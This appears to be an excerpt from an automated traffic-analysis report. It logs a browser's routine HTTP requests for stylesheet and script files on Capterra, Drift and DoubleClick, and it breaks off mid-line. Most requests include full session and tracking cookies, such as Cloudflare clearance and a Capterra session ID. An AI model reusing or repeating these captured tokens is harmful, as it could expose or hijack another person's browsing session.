Source: global traffic HTTP traffic detected: GET /_next/static/css/ad6d42fbadcc79ec.css HTTP/1.1Host: reviews.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://reviews.capterra.com/search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
Source: global traffic HTTP traffic detected: GET /_next/static/css/50b7e331868b2bdc.css HTTP/1.1Host: reviews.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://reviews.capterra.com/search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
Source: global traffic HTTP traffic detected: GET /_next/static/css/a4a58254eecf0029.css HTTP/1.1Host: reviews.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://reviews.capterra.com/search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
Source: global traffic HTTP traffic detected: GET /_next/static/css/09c885b096621154.css HTTP/1.1Host: reviews.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://reviews.capterra.com/search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
Source: global traffic HTTP traffic detected: GET /core/assets/js/24.f9f5e493.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /core/assets/js/17.17dea2aa.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /_next/static/css/8dc898c46ca225c7.css HTTP/1.1Host: reviews.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://reviews.capterra.com/search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
Source: global traffic HTTP traffic detected: GET /pagead/landing?gcs=G111&gcd=13t3t3t3t5l1&tag_exp=101529666&rnd=264372747.1725034611&url=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&dma=0&npa=0&gtm=45He48s0n81P4GLD4Nv76106154za200&auid=1810143887.1725034608 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ar_debug=1; IDE=AHWqTUnshLIM_CA9spkc8qZwYRIRrmQl4yeqfJZGLqc8fJU-I1ZDHzeNKdWNuA9P
Source: global traffic HTTP traffic detected: GET /_next/static/chunks/5664.58cbb27e06b11751.js HTTP/1.1Host: reviews.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
Source: global traffic HTTP traffic detected: GET /_next/static/chunks/6577.5b5e609812e044d0.js HTTP/1.1Host: reviews.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
Source: global traffic HTTP traffic detected: GET /_next/static/chunks/7357.225fc1d616fbda8a.js HTTP/1.1Host: reviews.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
Source: global traffic HTTP traffic detected: GET /_next/static/chunks/8977.dc99403a46707026.js HTTP/1.1Host: reviews.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
Source: global traffic HTTP traffic detected: GET /_next/static/chunks/3445.1bd0170ed561aadb.js HTTP/1.1Host: reviews.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; 